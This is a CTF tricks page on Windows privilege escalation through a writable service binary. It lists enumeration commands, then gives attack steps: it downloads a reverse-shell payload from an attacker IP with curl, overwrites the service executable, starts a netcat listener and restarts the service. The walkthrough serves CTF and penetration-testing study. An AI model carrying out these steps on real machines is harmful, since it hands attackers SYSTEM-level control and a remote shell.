> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/trick-0050/privilege-escalation-windows-service.md).

# Service

## Privesc via Writable Windows Service Binary

If a Windows service runs with high privileges (e.g., `LocalSystem`) and its executable file path or a parent directory is writable by your current low-privileged user, you can replace the legitimate service binary with your own malicious code. You also need permissions to stop and start the target service.

To identify potential targets, you can first list services and their executable paths using `sc qc`.

```bash
sc qc <service_name>
```

This command will show the `BINARY_PATH_NAME` for the service. Once you have the path, you need to check permissions.

Identify the writable service binary path and confirm you can stop/start the service (tools like PrivescCheck and commands like `sc sdshow` can help). To check the permissions of a service, you can use the `sc sdshow` command. This command displays the Security Descriptor Definition Language (SDDL) string for the service. Analyzing the SDDL string can reveal if low-privileged users have permissions like `SERVICE_CHANGE_CONFIG` (allows changing the service configuration, including the binary path), `WRITE_DAC` (allows modifying the Discretionary Access Control List, potentially granting oneself full control), `SERVICE_ALL_ACCESS` (full control over the service), `SERVICE_STOP` (allows stopping the service), or `SERVICE_START` (allows starting the service). An ACE like `(A;;CCLCSWLOCRRC;;;SU)` in the SDDL indicates Authenticated Users have permissions to create child objects, list contents, self-write, read control, and read properties on the service object itself, which can be indicative of weak permissions.

```bash
sc sdshow <service_name>
```

Additionally, you need to check the permissions on the service executable file itself and its parent directories using `icacls`. If a low-privileged user has write permissions on the service binary or a directory in its path, they can replace the legitimate executable with their own payload. Look for permissions like `(M)` (Modify), `(W)` (Write), `(D)` (Delete), or `(F)` (Full control) for your user or a group you belong to (like `BUILTIN\Users` or `NT AUTHORITY\Authenticated Users`).

```bash
icacls <filepath>
```

Automated tools can also help identify services with weak permissions. PowerSploit's `PowerUp.ps1` script contains functions like `Get-ModifiableService` and `Get-ModifiableServiceFile` that can enumerate services where the current user has permissions to modify the service configuration or write to the service executable file.

```powershell
Import-Module .\PowerUp.ps1
Get-ModifiableService
Get-ModifiableServiceFile
```

Once a vulnerable service is identified (e.g., service `spoofer-scheduler`) and you've confirmed write permissions on the binary path (e.g., `C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe`) and the ability to stop/start the service, proceed with replacement.

First, stop the service to release the lock on the executable file.

```bash
sc stop spoofer-scheduler
```

Download your malicious executable (e.g., a reverse shell payload) to overwrite the original service binary.

```bash
curl 10.11.77.141/spoofer-scheduler.exe -o C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
```

Ensure your attacker listener is ready (e.g., `rlwrap nc -lvnp 443`), then start the service.

```bash
sc start spoofer-scheduler
```

The service will now execute your payload with its high privileges.
